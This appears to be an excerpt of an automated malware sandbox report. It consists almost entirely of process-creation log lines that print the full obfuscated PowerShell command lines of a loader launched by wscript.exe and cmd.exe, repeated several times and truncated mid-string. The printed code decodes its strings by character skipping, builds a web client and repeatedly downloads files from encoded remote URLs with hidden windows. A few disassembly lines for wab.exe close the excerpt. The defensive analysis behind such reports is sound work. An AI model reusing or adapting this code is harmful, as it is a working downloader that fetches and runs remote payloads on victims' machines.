'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 17_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0468B8D8 push eax; iretd 5_2_0468B8D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_074709F0 push eax; mov dword ptr [esp], ecx 5_2_07470E7C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_23D72806 push ecx; ret 10_2_23D72819
